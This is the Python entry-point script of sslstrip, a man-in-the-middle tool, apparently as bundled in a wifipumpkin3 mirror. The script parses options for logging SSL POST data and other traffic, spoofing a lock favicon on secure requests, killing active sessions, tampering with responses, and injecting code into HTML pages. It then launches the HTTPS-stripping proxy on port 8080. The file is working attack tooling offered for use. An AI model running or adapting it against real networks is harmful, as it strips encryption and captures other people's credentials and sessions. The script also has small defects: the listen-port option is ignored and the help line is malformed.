mirror of
https://github.com/Cronocide/wifipumpkin3.git
synced 2025-01-23 03:39:18 +00:00
127 lines
4.9 KiB
Plaintext
127 lines
4.9 KiB
Plaintext
|
#!/usr/bin/env python3.6
|
||
|
|
|
||
|
|
"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks."""
|
||
|
|
|
||
|
|
__author__ = "Moxie Marlinspike"
|
||
|
|
__email__ = "moxie@thoughtcrime.org"
|
||
|
|
__license__= """
|
||
|
|
Copyright (c) 2004-2009 Moxie Marlinspike <moxie@thoughtcrime.org>
|
||
|
|
|
||
|
|
This program is free software; you can redistribute it and/or
|
||
|
|
modify it under the terms of the GNU General Public License as
|
||
|
|
published by the Free Software Foundation; either version 3 of the
|
||
|
|
License, or (at your option) any later version.
|
||
|
|
|
||
|
|
This program is distributed in the hope that it will be useful, but
|
||
|
|
WITHOUT ANY WARRANTY; without even the implied warranty of
|
||
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||
|
|
General Public License for more details.
|
||
|
|
|
||
|
|
You should have received a copy of the GNU General Public License
|
||
|
|
along with this program; if not, write to the Free Software
|
||
|
|
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||
|
|
USA
|
||
|
|
|
||
|
|
"""
|
||
|
|
|
||
|
|
from twisted.web import http
|
||
|
|
from twisted.internet import reactor
|
||
|
|
|
||
|
|
from wifipumpkin3.plugins.external.sslstrip.StrippingProxy import StrippingProxy
|
||
|
|
from wifipumpkin3.plugins.external.sslstrip.URLMonitor import URLMonitor
|
||
|
|
from wifipumpkin3.plugins.external.sslstrip.CookieCleaner import CookieCleaner
|
||
|
|
from wifipumpkin3.plugins.external.sslstrip.ResponseTampererFactory import ResponseTampererFactory
|
||
|
|
|
||
|
|
from wifipumpkin3.plugins.external.sslstrip.PluginsManager import PluginsManager
|
||
|
|
from wifipumpkin3.plugins.extension import *
|
||
|
|
|
||
|
|
import sys, getopt, logging, traceback, string, os
|
||
|
|
|
||
|
|
gVersion = "0.9"
|
||
|
|
|
||
|
|
def usage():
|
||
|
|
print("\nsslstrip " + gVersion + " by Moxie Marlinspike (mh4x0f)")
|
||
|
|
print("Fork: https://github.com/mh4x0f/sslstrip3")
|
||
|
|
print("Usage: sslstrip <options>\n")
|
||
|
|
print("Options:")
|
||
|
|
print("-w <filename>, --write=<filename> Specify file to log to (optional).")
|
||
|
|
print("-p , --post Log only SSL POSTs. (default)")
|
||
|
|
print("-s , --ssl Log all SSL traffic to and from server.")
|
||
|
|
print("-a , --all Log all SSL and HTTP traffic to and from server.")
|
||
|
|
print("-l <port>, --listen=<port> Port to listen on (default 10000).")
|
||
|
|
print("-f , --favicon Substitute a lock favicon on secure requests.")
|
||
|
|
print("-k , --killsessions Kill sessions in progress.")
|
||
|
|
print("-t <config>, --tamper <config> Enable response tampering with settings from <config>.")
|
||
|
|
print("-i , --inject Inject code into HTML pages using a text file.")
|
||
|
|
print("-h print(this help message.")
|
||
|
|
print("")
|
||
|
|
|
||
|
|
def parseOptions(argv):
|
||
|
|
logFile = 'sslstrip.log'
|
||
|
|
logLevel = logging.WARNING
|
||
|
|
listenPort = '8080'
|
||
|
|
spoofFavicon = False
|
||
|
|
killSessions = False
|
||
|
|
tamperConfigFile = False
|
||
|
|
injectFile = False
|
||
|
|
|
||
|
|
try:
|
||
|
|
opts, args = getopt.getopt(argv, "hw:l:psafkt:i:",
|
||
|
|
["help", "write=", "post", "ssl", "all", "listen=",
|
||
|
|
"favicon", "killsessions", "tamper=", "inject"])
|
||
|
|
|
||
|
|
for opt, arg in opts:
|
||
|
|
if opt in ("-h", "--help"):
|
||
|
|
usage()
|
||
|
|
sys.exit()
|
||
|
|
elif opt in ("-w", "--write"):
|
||
|
|
logFile = arg
|
||
|
|
elif opt in ("-p", "--post"):
|
||
|
|
logLevel = logging.WARNING
|
||
|
|
elif opt in ("-s", "--ssl"):
|
||
|
|
logLevel = logging.INFO
|
||
|
|
elif opt in ("-a", "--all"):
|
||
|
|
logLevel = logging.DEBUG
|
||
|
|
elif opt in ("-l", "--listen"):
|
||
|
|
listenPort = arg
|
||
|
|
elif opt in ("-f", "--favicon"):
|
||
|
|
spoofFavicon = True
|
||
|
|
elif opt in ("-k", "--killsessions"):
|
||
|
|
killSessions = True
|
||
|
|
elif opt in ("-t", "--tamper"):
|
||
|
|
tamperConfigFile = arg
|
||
|
|
elif opt in ("-i", "--inject"):
|
||
|
|
injectFile = arg
|
||
|
|
|
||
|
|
return (logFile, logLevel, listenPort, spoofFavicon, killSessions, tamperConfigFile, injectFile)
|
||
|
|
|
||
|
|
except getopt.GetoptError:
|
||
|
|
usage()
|
||
|
|
sys.exit(2)
|
||
|
|
|
||
|
|
def main(argv):
|
||
|
|
(logFile, logLevel, listenPort, spoofFavicon, killSessions, tamperConfigFile, injectFile) = parseOptions(argv)
|
||
|
|
|
||
|
|
URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
|
||
|
|
CookieCleaner.getInstance().setEnabled(killSessions)
|
||
|
|
ResponseTampererFactory.buildTamperer(tamperConfigFile)
|
||
|
|
strippingFactory = http.HTTPFactory(timeout=10)
|
||
|
|
strippingFactory.protocol = StrippingProxy
|
||
|
|
|
||
|
|
reactor.listenTCP(8080, strippingFactory)
|
||
|
|
|
||
|
|
print("\nsslstrip " + gVersion + " by Moxie Marlinspike running...")
|
||
|
|
|
||
|
|
|
||
|
|
plugins_manager = PluginsManager.getInstance()
|
||
|
|
|
||
|
|
all_plugins = base.BasePumpkin.__subclasses__()
|
||
|
|
for p in all_plugins:
|
||
|
|
plugins_manager.plugins = p
|
||
|
|
|
||
|
|
|
||
|
|
reactor.run()
|
||
|
|
|
||
|
|
if __name__ == '__main__':
|
||
|
|
main(sys.argv[1:])
|